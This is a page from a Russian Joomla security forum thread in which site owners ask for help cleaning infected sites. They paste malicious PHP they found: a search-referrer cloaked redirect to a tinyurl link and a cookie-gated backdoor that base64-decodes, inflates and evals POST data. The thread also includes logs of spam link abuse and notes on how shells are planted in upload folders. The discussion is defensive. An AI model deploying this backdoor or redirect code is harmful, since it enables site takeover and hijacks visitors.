Вирус на сайте, редирект, что делать как лечить! - страница 7 - Безопасность сайтов на Joomla

Мой .htaccess Хочу полностью разобраться, вроде ничего подозрительного нет.

Как прописывается редирект?если base64 не закодировано,

Скажите по каким запросам искать?

Уфф, до этого справлялся теперь что то никак

вычистил кучу заразы, обновил, поправил .htaccess, выполнил рекомендации с форума и один фиг через если открывать через поиск яндекса, происходит редирект, если открывать напрямую то все нормально

****

Код

редирект идёт на http://ds-konzepte.info/libraries/pear/arch/pages/if.php

кто нибудь поборол аналогичную заразу?

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://tinyurl.com/a4ak6x9");
      exit();
   }
}
}

Как прописывается редирект? Если 301 то тогда в ТК можем задать поиск по 301, если base64 не закодировано, то должны быть указаны ссылки, однако они тоже не находятся, каким спосбом еще может кодироваться код?

Как заливают shell:

Все просто нового ни чего не изобрели и не изобретут(хотя возможно но нет уверенности)
файл с shell заливается в основном в папки
Цитировать
images
images/stories
tmp

заливают либо сразу файл shell, либо "якобы картинку" файл с кодом и с расширением от изображения, который после загрузки либо остается таким же или ему меняют расширение, если он остается картинкой то тогда в этой директории появляется еще и файл .htaccesss для того чтоб этот файл работал

P.S: аналезируя код на уязвимые моменты и вредоносность обнаружил что зараза была в одном установочном компоненте, который волялся в исходной папке перед установкой /tmp, архивом, разархевировав нашел протрояненые страници редиректом, пологаю что на источнике откуда были скачены компоненты, протроянены... всего лишь предположение...

А по всему сайту зараза не могла прописаться?

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?

Найден кусок кода отвечающий за вывод левых ссылок

Код

<?php $random_key = @yt_fashion15(); ?>

Я так понимаю просто удалением дело не обойдется, скажите алгоритм действия такого вируса?

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?

на 3 странице данного топика - http://joomlaforum.ru/index.php/topic,246899.msg1272926.html#msg1272926 форумчане уже жаловались на эту проблему. Одним прекрасным солнечным зимним утром мною было обнаружено, что у сайта появилась вторая карта сайта, ведущая на 2500 других ресурсов или статей на самом же сайте - site.ru/?option=/cat/sitemap.html Проблема решилась довольно просто - были закачены файлы обновления Joomla 1.5 с 22 версии по 26 (хоть Joomla стояла и так последней версии). Дело в том, что как обычно - были замечены следы шела в папке картинок и изменён файл .htaccess  в этой же папке на закачку запрещённых форматов. Вроде всё подправил. Прошло два дня и вижу повторяющуюся картину - опять эта злополучная карта сайта, и перезаливка файлов уже не помогает.
Зашёл в логи, и вот, что увидел:

Код

173.199.115.99 - - [03/Mar/2013:04:35:45 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvYW1lcmlrYS9zZXZlcm5hamEtYW1lcmlrYS9zYWx2YWRvci5odG1s HTTP/1.1" 200 4684 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:31 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvZXZyYXppamEvZXZyb3BhL21vbGRvdmEuaHRtbA%3D%3D HTTP/1.1" 200 4672 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:43 +0400] "GET /?option=/cat/Rabota-menedzher-kafe.html HTTP/1.1" 200 62430 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)" 

Заранее спасибо, за высказывание идей - как это всё можно исправить!

в переменную link передался параметр равный в декодированом виде из базе64 "http://nravy-narodov.ru/amerika/severnaja-amerika/salvador.html"
во второй строчке передался такой урл: http://nravy-narodov.ru/evrazija/evropa/moldova.html

а вообще такая тактика действий очень похоже на прогоны!, это то что называется черным SEO!
Если это мешает вашему сайту, и вы не можите сами справится, то заказывайте чистку сайта!

<?php echo "#!!#";

<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

У меня на сайте наплодились кучу однообразных файлов с разными названиями
1 файл:
2 файл
Кто-нибудь в курсе что они делают и как с этим безобразием бороться?

Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на

Спойлер

[свернуть]

Как узнать кто из них кто?

File: /home/сайт/public_html/images/stories/Shemi/5559e.php
String:: $_POST[

File: /home/сайт/public_html/images/stories/1.php
String:: $_POST[

Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на

Спойлер

[свернуть]

Как узнать кто из них кто?

А кто в курсе, проанализируйте код

Этот норма, на разработчика.
playtoppokerru
метод document.write( , не вирус.А вот нижний код прописывает ссылку на отправку эмэйл support@trimori.com
klara7
удаляй все файлы с именем, рандомно состоящим из символом и цифр.Только в папке /cache , без фанатизма

$tmpl['md'] = base64_decode('PGRpdiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjb2xvcjojZDNkM2QzOyI+UG93ZXJlZCBieSA8YSBocmVmPSJodHRwOi8vd3d3LnBob2NhLmN6IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYS5jeiI+UGhvY2E8L2E+IDxhIGhyZWY9Imh0dHA6Ly93d3cucGhvY2EuY3ovcGhvY2FnYWxsZXJ5IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYSBHYWxsZXJ5Ij5HYWxsZXJ5PC9hPjwvZGl2Pg0K');

(последние через что заливают это редактор JCE, менеджер расширений nonumber.nl, ну и старые не актуальные версии joomla)